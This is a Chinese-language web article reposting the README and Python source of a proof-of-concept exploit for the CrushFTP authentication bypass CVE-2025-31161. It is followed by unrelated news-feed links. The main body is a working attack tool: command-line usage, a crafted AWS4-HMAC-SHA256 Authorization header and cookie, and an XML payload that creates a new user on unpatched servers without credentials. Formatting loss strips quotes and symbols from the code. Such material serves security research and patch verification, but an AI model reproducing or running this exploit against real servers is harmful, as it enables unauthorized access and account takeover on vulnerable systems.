CVE-2025-31161漏洞利用工具:深入剖析CrushFTP身份验证绕过
CVE-2025-31161 漏洞利用与分析工具项目描述本项目是一个针对CVE-2025-31161的概念验证PoC漏洞利用工具。该漏洞存在于CrushFTP软件中是一个**关键级别CVSS 9.8**的身份验证绕过漏洞允许攻击者在无需任何凭证的情况下创建新的用户账户获得对受影响CrushFTP服务器的完全访问权限。受影响版本CrushFTP 10.0.0–10.8.3CrushFTP 11.0.0–11.3.0已修复版本10.8.4 和 11.3.1功能特性核心漏洞利用功能身份验证绕过利用AWS4-HMAC-SHA256认证机制中的逻辑缺陷通过特制的Authorization头绕过身份验证检查任意用户创建无需有效凭证即可在目标系统上创建新用户账户自定义配置支持指定目标用户名、新创建用户的用户名和密码灵活的端口设置可配置目标服务器的HTTP端口默认8080技术特性完整的HTTP请求构造精确模拟漏洞触发所需的HTTP请求格式预热检测机制包含目标可达性检测提高利用成功率详细的状态反馈提供每一步操作的执行状态和结果信息命令行参数支持通过argparse提供丰富的命令行选项安全研究价值教育研究帮助安全研究人员理解该漏洞的利用原理安全测试用于授权范围内的渗透测试和漏洞验证修复验证验证CrushFTP服务器是否已正确应用安全补丁安装指南系统要求Python 3.6 或更高版本网络访问权限用于连接到目标服务器必要的权限仅在授权测试环境中使用依赖安装该工具依赖于requests库发送HTTP请求pipinstallrequests或者通过requirements.txt安装pipinstall-r requirements.txt快速安装克隆项目并直接运行gitclone https://github.com/B1ack4sh/Blackash-CVE-2025-31161.gitcdBlackash-CVE-2025-31161 python cve-2025-31161.py --help使用说明基本用法最基本的用法只需要指定目标主机python cve-2025-31161.py --target_host192.168.1.100完整参数示例python cve-2025-31161.py\--target_host vulnerable-server.example.com\--port8080\--target_user crushadmin\--new_user BackdoorAdmin\--password Pssw0rd123!命令行参数详解参数描述默认值必需--target_host目标服务器主机名或IP地址无是--portCrushFTP Web接口端口8080否--target_user目标存在的用户名用于伪造crushadmin否--new_user要创建的新用户名AuthBypassAccount否--password新用户的密码CorrectHorseBatteryStaple否--help显示帮助信息--使用示例示例1针对默认配置的测试python cve-2025-31161.py --target_host10.0.0.5这将尝试在10.0.0.5:8080上使用默认参数创建用户。示例2自定义用户创建python cve-2025-31161.py\--target_host ftp.company.com\--port80\--new_user pentester\--password Test123456示例3指定不同的目标用户python cve-2025-31161.py\--target_host192.168.56.101\--target_user admin\--new_user system_access\--password SecurePass!2024输出说明工具执行时会显示详细的进度信息[] Preparing Payloads [-] Warming up the target [-] Target is up and running [] Sending Account Create Request [!] User created successfully [] Exploit Complete you can now login with [*] Username: pentester [*] Password: Test123456.注意事项合法使用仅在你拥有明确授权的系统上进行测试风险警告在未经授权的系统上使用此工具可能违反法律修复验证运行此工具前请确保目标系统已更新到修复版本或已获得测试授权环境影响成功利用将创建新的系统用户可能影响系统安全状态核心代码主漏洞利用函数defexploit(target_host,port,target_user,new_user,password): 利用CVE-2025-31161漏洞在目标CrushFTP服务器上创建新用户 参数: target_host: 目标服务器主机名或IP地址 port: CrushFTP Web接口端口 target_user: 目标系统中存在的用户名用于伪造请求 new_user: 要创建的新用户名 password: 新用户的密码 print([] Preparing Payloads)# 构造目标URLwarm_up_urlfhttp://{target_host}:{port}/WebInterface/function/create_user_urlfhttp://{target_host}:{port}/WebInterface/function/# 构造利用漏洞所需的HTTP头# 关键点Authorization头中的错误格式触发身份验证绕过headers{Cookie:currentAuth31If; CrushAuth1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If,Authorization:AWS4-HMAC-SHA256 Credentialcrushadmin/,Connection:close,}# 构造创建用户的XML payload# 包含新用户的完整配置信息payload{command:setUserItem,data_action:replace,serverGroup:MainUsers,username:new_user,user:f?xml version1.0 encodingUTF-8?user typepropertiesuser_name{new_user}/user_namepassword{password}/passwordextra_vfs typevector/extra_vfsversion1.0/versionroot_dir//root_diruserVersion6/userVersionmax_logins0/max_loginssite(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)/sitecreated_by_username{target_user}/created_by_usernamecreated_by_email/created_by_emailcreated_time1744120753370/created_timepassword_history/password_history/user,xmlItem:user,vfs_items:?xml version1.0 encodingUTF-8?vfs typevector/vfs,permissions:?xml version1.0 encodingUTF-8?VFS typepropertiesitem name/(read)(view)(resume)/item/VFS,c2f:31If}# 第一步预热目标服务器检查可达性print( [-] Warming up the target)try:warm_up_requestrequests.get(warm_up_url,headersheaders,timeout20)ifwarm_up_request.status_code200:print( [-] Target is up and running)exceptrequests.exceptions.ConnectionError:print( [-] Request timed out, continuing with exploit)# 第二步发送创建用户的请求print([] Sending Account Create Request)create_user_requestrequests.post(create_user_url,headersheaders,datapayload)# 检查请求是否成功ifcreate_user_request.status_code!200:print( [-] Failed to send request)print( [] Status code:,create_user_request.status_code)# 检查响应中是否包含成功标识ifresponse_statusOK/response_statusincreate_user_request.text:print( [!] User created successfully)命令行参数解析if__name____main__: 主程序入口点处理命令行参数并调用漏洞利用函数 # 创建参数解析器parserArgumentParser(descriptionExploit CVE-2025-31161 to create a new account)# 定义命令行参数parser.add_argument(--target_host,helpTarget host)parser.add_argument(--port,typeint,helpTarget port,default8080)parser.add_argument(--target_user,helpTarget user,defaultcrushadmin)parser.add_argument(--new_user,helpNew user to create,defaultAuthBypassAccount)parser.add_argument(--password,helpPassword for the new user,defaultCorrectHorseBatteryStaple)# 解析命令行参数argsparser.parse_args()# 验证必需参数ifnotargs.target_host:print( [-] Target host not specified)parser.print_help()exit(1)# 调用漏洞利用函数exploit(target_hostargs.target_host,portargs.port,target_userargs.target_user,new_userargs.new_user,passwordargs.password)# 输出成功信息print(f[] Exploit Complete you can now login with\n [*] Username:{args.new_user}\n [*] Password:{args.password}.)漏洞原理说明# 关键漏洞触发点分析## 1. AWS4-HMAC-SHA256认证机制缺陷# Authorization: AWS4-HMAC-SHA256 Credentialcrushadmin/# 注意这里的Credential值以斜杠结尾这种格式会触发身份验证逻辑中的错误## 2. 逻辑缺陷# - 认证解析器在解析Credential时可能出现索引越界# - 导致后续的身份验证检查被跳过# - 允许使用任意已知用户名如crushadmin但无需密码## 3. 利用方式# - 通过setUserItem命令创建新用户# - XML格式的用户数据直接嵌入在POST参数中# - 伪造created_by_username字段为存在的用户## 4. 成功条件# - 服务器响应中包含response_statusOK/response_status# - 新用户将具有完整的访问权限读、查看、恢复等漏洞技术细节根据漏洞描述CVE-2025-31161的核心问题在于认证机制CrushFTP使用了AWS4-HMAC-SHA256认证方案解析错误当Authorization头包含格式错误的Credential时如Credentialcrushadmin/边界条件解析器可能出现索引越界错误绕过结果完全跳过用户验证允许未经授权的操作该漏洞已被添加到CISA的已知被利用漏洞KEV目录中表明其在实际攻击中被广泛利用。FINISHED6HFtX5dABrKlqXeO5PUv/84SoIoTE3firf/5vX8AZ6p0TxqPwO1tsBau7No6Sln更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享

相关新闻

Dify-tool-service工具使用方法

Dify-tool-service工具使用方法

https://github.com/brightwang/dify-tool-service 说明 本仓库为B站:AI带路党Pro相关Dify实战教程配套参考 dify-mermaid-flask-service 为AI带路党Pro视频Dify实战教程:搭建AI自动生成流程图、序列图、甘特图等图表agent准备 使用指南 拷贝mermaid-flask-service到dif…

2026/7/8 3:11:57 阅读更多 →
西门子软件合规审计流程:SolidEdge的license自查要点解析

西门子软件合规审计流程:SolidEdge的license自查要点解析

西门子软件合规审计流程:SolidEdge的license自查要点解析作为一名长期从事企业软件合规与系统管理的技术专家,我经常接触到来自不同行业企业的软件审计问题,是在使用西门子工业软件,比如SolidEdge的企业中,license合规…

2026/7/4 19:20:17 阅读更多 →
玩转IoTDB文件体系:核心工具与数据目录、TsFile全维度查看实战

玩转IoTDB文件体系:核心工具与数据目录、TsFile全维度查看实战

IoTDB作为专为时序数据设计的高性能数据库,其底层以TsFile为核心的文件体系是保障数据存储、读写性能的关键,而数据目录的合理管理、各类核心文件的精准查看则是日常运维、问题排查、性能调优的基础能力。 本文将从IoTDB文件体系底层逻辑出发&#xff0…

2026/7/3 14:59:00 阅读更多 →

最新新闻

倒排索引(Inverted Index)原理与应用详解

倒排索引(Inverted Index)原理与应用详解

1. 什么是倒排索引?倒排索引(Inverted Index)是信息检索领域最核心的数据结构之一,也是现代搜索引擎、数据库全文检索和文档检索系统的基石。与传统的正排索引(从文档 ID 到文档内容)不同,倒排索…

2026/7/8 17:05:52 阅读更多 →
UEDumper:深入解析Unreal Engine运行时内存结构与逆向分析

UEDumper:深入解析Unreal Engine运行时内存结构与逆向分析

1. 项目概述:为什么我们需要UEDumper?如果你是一名Unreal Engine开发者,无论是做游戏、影视动画还是数字孪生,你肯定遇到过这样的场景:项目运行得好好的,突然崩溃了,弹出一个几乎看不懂的崩溃报…

2026/7/8 17:03:51 阅读更多 →
Unity WebGL移动端输入法兼容性解决方案:零配置实现跨平台完美输入

Unity WebGL移动端输入法兼容性解决方案:零配置实现跨平台完美输入

1. 项目概述:当Unity WebGL遇上输入法,一场无声的战争如果你做过Unity WebGL项目,特别是那些需要用户输入文字的应用——无论是聊天室、表单提交、还是游戏内的角色命名——那你大概率经历过这个噩梦:在桌面浏览器里输入一切正常&…

2026/7/8 16:59:47 阅读更多 →
学术写作的超级快充!全能AI写作辅助平台,思路秒出超省心

学术写作的超级快充!全能AI写作辅助平台,思路秒出超省心

作为一名刚完成毕业论文的过来人,我太懂写论文的痛苦了 —— 选题迷茫、文献浩如烟海、框架混乱、内容重复、查重降重反复折腾... 直到我发现了这套 AI 写作工具组合,简直是论文写作的 "开挂神器",效率直接拉满,原本 3 …

2026/7/8 16:57:44 阅读更多 →
救命!2026年AI论文工具排行榜,选题卡壳的毕业生直接抄作业

救命!2026年AI论文工具排行榜,选题卡壳的毕业生直接抄作业

作为熬了 3 年论文、前后踩过十几款 AI 写作工具坑的老学长,今天直接给大家上硬货 ——2026 年 AI 写论文工具排行榜!结合《2025 论文写作工具白皮书》的用户实测数据,还有我从本科毕设到硕士小论文的全程使用体验,精选出 7 款真正…

2026/7/8 16:57:44 阅读更多 →
AI宏观因子分析:前联储官员研判年内紧缩概率上升,9月或成关键政策观察窗口的机器学习预测模型

AI宏观因子分析:前联储官员研判年内紧缩概率上升,9月或成关键政策观察窗口的机器学习预测模型

摘要:本文通过AI宏观因子分析模型,结合核心通胀数据、货币政策预期、债券市场定价、国际油价变化及AI生产率因素,分析市场对于年内货币政策路径的最新判断,以及人工智能技术对通胀与利率预期的潜在影响。 一、AI宏观信号识别&…

2026/7/8 16:55:41 阅读更多 →

日新闻

3大核心能力重塑《明日方舟》游戏体验:MAA自动化助手的革命性突破

3大核心能力重塑《明日方舟》游戏体验:MAA自动化助手的革命性突破

3大核心能力重塑《明日方舟》游戏体验:MAA自动化助手的革命性突破 【免费下载链接】MaaAssistantArknights 《明日方舟》小助手,全日常一键长草!| A one-click tool for the daily tasks of Arknights, supporting all clients. 项目地址: …

2026/7/8 0:00:48 阅读更多 →
MyBatis 批量操作深度优化——从 N+1 到批处理的全路径

MyBatis 批量操作深度优化——从 N+1 到批处理的全路径

MyBatis 批量操作深度优化——从 N1 到批处理的全路径 一、从"功能正确"到"性能可接受"——MyBatis 批量操作的三段式进化 MyBatis 在日常增删改查场景中几乎是无感的——实体映射直观、SQL 控制灵活。但当数据量从千级上升到十万级、百万级,许…

2026/7/8 0:00:48 阅读更多 →
工业负载控制方案:TPD2015FN与PIC18F45K22应用解析

工业负载控制方案:TPD2015FN与PIC18F45K22应用解析

1. 工业负载控制方案概述在工业自动化、电机驱动和照明控制等高需求场景中,可靠地控制电感和电阻负载是核心挑战之一。TPD2015FN作为东芝的8通道高端智能功率开关IC,配合PIC18F45K22微控制器,能够构建一套稳定、高效的负载控制系统。这套组合…

2026/7/8 0:02:48 阅读更多 →

周新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/8 16:14:06 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/7 12:34:47 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/8 16:59:55 阅读更多 →

月新闻